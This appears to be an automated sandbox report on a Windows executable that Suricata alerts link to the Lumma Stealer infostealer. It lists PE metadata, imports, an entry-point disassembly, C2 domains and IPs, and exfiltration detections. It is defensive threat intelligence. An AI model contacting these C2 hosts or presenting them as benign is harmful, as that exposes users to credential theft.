                                                                                                                                                                        SSDEEP:393216:xa8RFy/nyLknMNJsywsseZIX2MURx3cor8:xBRFYnaBwvemGRvXr8
                                                                                                                                                                        TLSH:7BD6334B9ED400AAC429BCB595317431F5333C41D7509FAE13BEBA261AE3F586D6E20E
                                                                                                                                                                        File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.........B#..,p..,p..,p.:.p..,p.:.p5.,p.:.p..,p<..p..,p<.(q..,p<./q..,p<.)q..,p...p..,p...p..,p...p..,p..-p..,p2.)q..,p2.,q..,p2..p..,

                                                                                                                                                                        File Icon

                                                                                                                                                                        Icon Hash:070c1c3d5ccf4f38

                                                                                                                                                                        Static PE Info

                                                                                                                                                                        General

                                                                                                                                                                        Entrypoint:0x1400266b0
                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                        Time Stamp:0x6640972B [Sun May 12 10:17:15 2024 UTC]
                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                        OS Version Major:5
                                                                                                                                                                        OS Version Minor:2
                                                                                                                                                                        File Version Major:5
                                                                                                                                                                        File Version Minor:2
                                                                                                                                                                        Subsystem Version Major:5
                                                                                                                                                                        Subsystem Version Minor:2
                                                                                                                                                                        Import Hash:e8a30656287fe831c9782204ed10cd68

                                                                                                                                                                        Entrypoint Preview

                                                                                                                                                                        Instruction
                                                                                                                                                                        dec eax
                                                                                                                                                                        sub esp, 28h
                                                                                                                                                                        call 00007FD8F955B248h
                                                                                                                                                                        dec eax
                                                                                                                                                                        add esp, 28h
                                                                                                                                                                        jmp 00007FD8F955ABDFh
                                                                                                                                                                        int3
                                                                                                                                                                        int3
                                                                                                                                                                        dec eax
                                                                                                                                                                        mov eax, esp
                                                                                                                                                                        dec eax
                                                                                                                                                                        mov dword ptr [eax+08h], ebx
                                                                                                                                                                        dec eax
                                                                                                                                                                        mov dword ptr [eax+10h], ebp
                                                                                                                                                                        dec eax
                                                                                                                                                                        mov dword ptr [eax+18h], esi
                                                                                                                                                                        dec eax
                                                                                                                                                                        mov dword ptr [eax+20h], edi
                                                                                                                                                                        inc ecx
                                                                                                                                                                        push esi
                                                                                                                                                                        dec eax
                                                                                                                                                                        sub esp, 20h
                                                                                                                                                                        dec ebp
                                                                                                                                                                        mov edx, dword ptr [ecx+38h]
                                                                                                                                                                        dec eax
                                                                                                                                                                        mov esi, edx
                                                                                                                                                                        dec ebp
                                                                                                                                                                        mov esi, eax
                                                                                                                                                                        dec eax
                                                                                                                                                                        mov ebp, ecx
                                                                                                                                                                        dec ecx
                                                                                                                                                                        mov edx, ecx
                                                                                                                                                                        dec eax
                                                                                                                                                                        mov ecx, esi
                                                                                                                                                                        dec ecx
                                                                                                                                                                        mov edi, ecx
                                                                                                                                                                        inc ecx
                                                                                                                                                                        mov ebx, dword ptr [edx]
                                                                                                                                                                        dec eax
                                                                                                                                                                        shl ebx, 04h
                                                                                                                                                                        dec ecx
                                                                                                                                                                        add ebx, edx
                                                                                                                                                                        dec esp
                                                                                                                                                                        lea eax, dword ptr [ebx+04h]
                                                                                                                                                                        call 00007FD8F955A1A3h
                                                                                                                                                                        mov eax, dword ptr [ebp+04h]
                                                                                                                                                                        and al, 66h
                                                                                                                                                                        neg al
                                                                                                                                                                        mov eax, 00000001h
                                                                                                                                                                        sbb edx, edx
                                                                                                                                                                        neg edx
                                                                                                                                                                        add edx, eax
                                                                                                                                                                        test dword ptr [ebx+04h], edx
                                                                                                                                                                        je 00007FD8F955AD73h
                                                                                                                                                                        dec esp
                                                                                                                                                                        mov ecx, edi
                                                                                                                                                                        dec ebp
                                                                                                                                                                        mov eax, esi
                                                                                                                                                                        dec eax
                                                                                                                                                                        mov edx, esi
                                                                                                                                                                        dec eax
                                                                                                                                                                        mov ecx, ebp
                                                                                                                                                                        call 00007FD8F955CA33h
                                                                                                                                                                        dec eax
                                                                                                                                                                        mov ebx, dword ptr [esp+30h]
                                                                                                                                                                        dec eax
                                                                                                                                                                        mov ebp, dword ptr [esp+38h]
                                                                                                                                                                        dec eax
                                                                                                                                                                        mov esi, dword ptr [esp+40h]
                                                                                                                                                                        dec eax
                                                                                                                                                                        mov edi, dword ptr [esp+48h]
                                                                                                                                                                        dec eax
                                                                                                                                                                        add esp, 20h
                                                                                                                                                                        inc ecx
                                                                                                                                                                        pop esi
                                                                                                                                                                        ret
                                                                                                                                                                        int3
                                                                                                                                                                        int3
                                                                                                                                                                        int3
                                                                                                                                                                        dec eax
                                                                                                                                                                        sub esp, 48h
                                                                                                                                                                        dec eax
                                                                                                                                                                        lea ecx, dword ptr [esp+20h]
                                                                                                                                                                        call 00007FD8F9559C73h
                                                                                                                                                                        dec eax
                                                                                                                                                                        lea edx, dword ptr [00023B67h]
                                                                                                                                                                        dec eax
                                                                                                                                                                        lea ecx, dword ptr [esp+20h]
                                                                                                                                                                        call 00007FD8F955BE42h
                                                                                                                                                                        int3
                                                                                                                                                                        jmp 00007FD8F9561C10h
                                                                                                                                                                        int3
                                                                                                                                                                        int3
                                                                                                                                                                        int3
                                                                                                                                                                        int3
                                                                                                                                                                        int3
                                                                                                                                                                        int3

                                                                                                                                                                        Rich Headers

                                                                                                                                                                        Programming Language:
                                                                                                                                                                        • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                        • [IMP] VS2008 SP1 build 30729

                                                                                                                                                                        Data Directories

                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x4b1e00x34.rdata
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x4b2140x50.rdata
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x710000x1f964.rsrc
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x6c0000x2ab4.pdata
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x910000x938.reloc
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x460e00x54.rdata
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x461800x28.rdata
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x3de100x140.rdata
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x3b0000x4a0.rdata
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x4a4ac0x100.rdata
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                        Sections

                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                        .text0x10000x398ce0x39a0043edabbddfa6948cff2e968fd336a07dFalse0.5457226138828634data6.465308419785883IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                        .rdata0x3b0000x1118c0x1120053297ea4f69cf70feab0538ecef732e2False0.44722285583941607data5.215657068009717IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                        .data0x4d0000x1ef5c0x1a0008eb45cbc6a0e70bd1c0a96a66c4a6d0False0.2765925480769231DOS executable (block device driver o\3050)3.1766622656728773IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                        .pdata0x6c0000x2ab40x2c00703496d6ceba70b1fe234ccc9c454141False0.4807350852272727data5.409685184469512IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                        .didat0x6f0000x3080x400c445681068e68e0f8df59c5ea517c5e5False0.2421875data2.786346435110699IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                        _RDATA0x700000x15c0x200b999e3f72a9a42ebb4d9b8fafa0a18e7False0.40625data3.3314534700182197IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                        .rsrc0x710000x1f9640x1fa00e91f632c67ce39b29c85915cd0a6bd9fFalse0.23395040760869565data4.816361806689922IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                        .reloc0x910000x9380xa00c057cd0b29d094da3cebf433be170d6dFalse0.498828125data5.228587706357198IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                        Resources

                                                                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                        PNG0x716440xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
                                                                                                                                                                        PNG0x7218c0x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
                                                                                                                                                                        RT_ICON0x737380x2655PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9913380209925609
                                                                                                                                                                        RT_ICON0x75d900x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 3779 x 3779 px/m0.0588844197326393
                                                                                                                                                                        RT_ICON0x865b80x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 3779 x 3779 px/m0.1115375531412376
                                                                                                                                                                        RT_ICON0x8a7e00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 3779 x 3779 px/m0.15020746887966804
                                                                                                                                                                        RT_ICON0x8cd880x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 3779 x 3779 px/m0.2223264540337711
                                                                                                                                                                        RT_ICON0x8de300x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 3779 x 3779 px/m0.45478723404255317
                                                                                                                                                                        RT_DIALOG0x8e2980x286dataEnglishUnited States0.5092879256965944
                                                                                                                                                                        RT_DIALOG0x8e5200x13adataEnglishUnited States0.60828025477707
                                                                                                                                                                        RT_DIALOG0x8e65c0xecdataEnglishUnited States0.6991525423728814
                                                                                                                                                                        RT_DIALOG0x8e7480x12edataEnglishUnited States0.5927152317880795
                                                                                                                                                                        RT_DIALOG0x8e8780x338dataEnglishUnited States0.45145631067961167
                                                                                                                                                                        RT_DIALOG0x8ebb00x252dataEnglishUnited States0.5757575757575758
                                                                                                                                                                        RT_STRING0x8ee040x1e2dataEnglishUnited States0.3900414937759336
                                                                                                                                                                        RT_STRING0x8efe80x1ccdataEnglishUnited States0.4282608695652174
                                                                                                                                                                        RT_STRING0x8f1b40x1b8dataEnglishUnited States0.45681818181818185
                                                                                                                                                                        RT_STRING0x8f36c0x146dataEnglishUnited States0.5153374233128835
                                                                                                                                                                        RT_STRING0x8f4b40x46cdataEnglishUnited States0.3454063604240283
                                                                                                                                                                        RT_STRING0x8f9200x166dataEnglishUnited States0.49162011173184356
                                                                                                                                                                        RT_STRING0x8fa880x152dataEnglishUnited States0.5059171597633136
                                                                                                                                                                        RT_STRING0x8fbdc0x10adataEnglishUnited States0.49624060150375937
                                                                                                                                                                        RT_STRING0x8fce80xbcdataEnglishUnited States0.6329787234042553
                                                                                                                                                                        RT_STRING0x8fda40x1c0dataEnglishUnited States0.5178571428571429
                                                                                                                                                                        RT_STRING0x8ff640x250dataEnglishUnited States0.44256756756756754
                                                                                                                                                                        RT_GROUP_ICON0x901b40x5adata0.7666666666666667
                                                                                                                                                                        RT_MANIFEST0x902100x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3957333333333333

                                                                                                                                                                        Imports

                                                                                                                                                                        DLLImport
                                                                                                                                                                        KERNEL32.dllLocalFree, GetLastError, SetLastError, FormatMessageW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileTime, CloseHandle, CreateFileW, GetCurrentProcessId, CreateDirectoryW, RemoveDirectoryW, SetFileAttributesW, GetFileAttributesW, DeleteFileW, MoveFileW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetModuleFileNameW, SetCurrentDirectoryW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, ExpandEnvironmentStringsW, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, GetTimeFormatW, GetDateFormatW, GetCurrentProcess, GetExitCodeProcess, WaitForSingleObject, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapReAlloc, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, SetEvent, ResetEvent, WaitForSingleObjectEx, CreateEventW, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlPcToFileHeader, RtlUnwindEx, EncodePointer, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP
                                                                                                                                                                        OLEAUT32.dllSysAllocString, SysFreeString, VariantClear
                                                                                                                                                                        gdiplus.dllGdipCloneImage, GdipAlloc, GdipDisposeImage, GdipCreateBitmapFromStream, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree

                                                                                                                                                                        Possible Origin

                                                                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                        EnglishUnited States

                                                                                                                                                                        Network Behavior

                                                                                                                                                                        Suricata IDS Alerts

                                                                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                        2024-10-31T01:05:20.635488+01002056752ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deepymouthi .sbs)1192.168.2.4637351.1.1.153UDP
                                                                                                                                                                        2024-10-31T01:05:20.647197+01002056760ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (monstourtu .sbs)1192.168.2.4590661.1.1.153UDP
                                                                                                                                                                        2024-10-31T01:05:20.659161+01002056756ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (heroicmint .sbs)1192.168.2.4524121.1.1.153UDP
                                                                                                                                                                        2024-10-31T01:05:20.670626+01002056762ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sidercotay .sbs)1192.168.2.4622131.1.1.153UDP
                                                                                                                                                                        2024-10-31T01:05:20.681200+01002056750ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (captaitwik .sbs)1192.168.2.4589041.1.1.153UDP
                                                                                                                                                                        2024-10-31T01:05:20.691871+01002056766ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrigglesight .sbs)1192.168.2.4573191.1.1.153UDP
                                                                                                                                                                        2024-10-31T01:05:20.704815+01002056754ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ferrycheatyk .sbs)1192.168.2.4609251.1.1.153UDP
                                                                                                                                                                        2024-10-31T01:05:20.715001+01002056764ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (snailyeductyi .sbs)1192.168.2.4496261.1.1.153UDP
                                                                                                                                                                        2024-10-31T01:05:22.218518+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.449734104.102.49.254443TCP
                                                                                                                                                                        2024-10-31T01:05:23.695491+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449736104.21.32.196443TCP
                                                                                                                                                                        2024-10-31T01:05:23.695491+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449736104.21.32.196443TCP
                                                                                                                                                                        2024-10-31T01:05:24.818599+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449738104.21.32.196443TCP
                                                                                                                                                                        2024-10-31T01:05:24.818599+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449738104.21.32.196443TCP
                                                                                                                                                                        2024-10-31T01:05:33.735583+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449743104.21.32.196443TCP

                                                                                                                                                                        Network Port Distribution

                                                                                                                                                                        TCP Packets

                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                        Oct 31, 2024 01:05:20.739274025 CET49734443192.168.2.4104.102.49.254
                                                                                                                                                                        Oct 31, 2024 01:05:20.739316940 CET44349734104.102.49.254192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:20.739388943 CET49734443192.168.2.4104.102.49.254
                                                                                                                                                                        Oct 31, 2024 01:05:20.742279053 CET49734443192.168.2.4104.102.49.254
                                                                                                                                                                        Oct 31, 2024 01:05:20.742289066 CET44349734104.102.49.254192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:21.581840038 CET44349734104.102.49.254192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:21.581938982 CET49734443192.168.2.4104.102.49.254
                                                                                                                                                                        Oct 31, 2024 01:05:21.584791899 CET49734443192.168.2.4104.102.49.254
                                                                                                                                                                        Oct 31, 2024 01:05:21.584803104 CET44349734104.102.49.254192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:21.585212946 CET44349734104.102.49.254192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:21.637260914 CET49734443192.168.2.4104.102.49.254
                                                                                                                                                                        Oct 31, 2024 01:05:21.683339119 CET44349734104.102.49.254192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:22.218590021 CET44349734104.102.49.254192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:22.218615055 CET44349734104.102.49.254192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:22.218624115 CET44349734104.102.49.254192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:22.218641043 CET44349734104.102.49.254192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:22.218650103 CET44349734104.102.49.254192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:22.218693972 CET49734443192.168.2.4104.102.49.254
                                                                                                                                                                        Oct 31, 2024 01:05:22.218714952 CET44349734104.102.49.254192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:22.218739986 CET49734443192.168.2.4104.102.49.254
                                                                                                                                                                        Oct 31, 2024 01:05:22.218775988 CET49734443192.168.2.4104.102.49.254
                                                                                                                                                                        Oct 31, 2024 01:05:22.234962940 CET44349734104.102.49.254192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:22.235033989 CET44349734104.102.49.254192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:22.235085964 CET49734443192.168.2.4104.102.49.254
                                                                                                                                                                        Oct 31, 2024 01:05:22.235100031 CET44349734104.102.49.254192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:22.235119104 CET49734443192.168.2.4104.102.49.254
                                                                                                                                                                        Oct 31, 2024 01:05:22.235145092 CET49734443192.168.2.4104.102.49.254
                                                                                                                                                                        Oct 31, 2024 01:05:22.243952990 CET44349734104.102.49.254192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:22.244013071 CET49734443192.168.2.4104.102.49.254
                                                                                                                                                                        Oct 31, 2024 01:05:22.250996113 CET44349734104.102.49.254192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:22.251065016 CET49734443192.168.2.4104.102.49.254
                                                                                                                                                                        Oct 31, 2024 01:05:22.251069069 CET44349734104.102.49.254192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:22.251110077 CET44349734104.102.49.254192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:22.253298044 CET49734443192.168.2.4104.102.49.254
                                                                                                                                                                        Oct 31, 2024 01:05:22.267105103 CET49734443192.168.2.4104.102.49.254
                                                                                                                                                                        Oct 31, 2024 01:05:22.267129898 CET44349734104.102.49.254192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:22.557188034 CET49736443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:22.557224035 CET44349736104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:22.557295084 CET49736443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:22.557580948 CET49736443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:22.557593107 CET44349736104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:23.198942900 CET44349736104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:23.199018002 CET49736443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:23.202739000 CET49736443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:23.202749014 CET44349736104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:23.202950954 CET44349736104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:23.212043047 CET49736443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:23.212057114 CET49736443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:23.212100983 CET44349736104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:23.695482969 CET44349736104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:23.695557117 CET44349736104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:23.695750952 CET49736443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:23.695842981 CET49736443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:23.695853949 CET44349736104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:23.695880890 CET49736443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:23.695887089 CET44349736104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:23.754514933 CET49738443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:23.754534960 CET44349738104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:23.754615068 CET49738443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:23.754882097 CET49738443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:23.754892111 CET44349738104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:24.373007059 CET44349738104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:24.373090982 CET49738443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:24.374651909 CET49738443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:24.374661922 CET44349738104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:24.374906063 CET44349738104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:24.384278059 CET49738443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:24.384303093 CET49738443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:24.384372950 CET44349738104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:24.818615913 CET44349738104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:24.818664074 CET44349738104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:24.818707943 CET44349738104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:24.818737030 CET44349738104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:24.818764925 CET49738443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:24.818770885 CET44349738104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:24.818780899 CET44349738104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:24.818799973 CET49738443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:24.818818092 CET49738443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:24.818826914 CET44349738104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:24.818861008 CET44349738104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:24.819174051 CET49738443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:24.819180012 CET44349738104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:24.823539019 CET44349738104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:24.827194929 CET49738443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:24.827208996 CET44349738104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:24.876058102 CET49738443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:24.937252045 CET44349738104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:24.937314987 CET44349738104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:24.937366962 CET49738443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:24.937376976 CET44349738104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:24.937434912 CET44349738104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:24.937475920 CET49738443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:24.978060007 CET49738443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:24.978075027 CET44349738104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:25.328232050 CET49739443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:25.328272104 CET44349739104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:25.328356981 CET49739443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:25.328758955 CET49739443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:25.328771114 CET44349739104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:25.929438114 CET44349739104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:25.929585934 CET49739443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:25.931088924 CET49739443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:25.931097984 CET44349739104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:25.931299925 CET44349739104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:25.933322906 CET49739443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:25.933512926 CET49739443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:25.933546066 CET44349739104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:25.933619976 CET49739443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:25.933626890 CET44349739104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:26.511029005 CET44349739104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:26.511121035 CET44349739104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:26.511179924 CET49739443192.168.2.4104.21.32.196
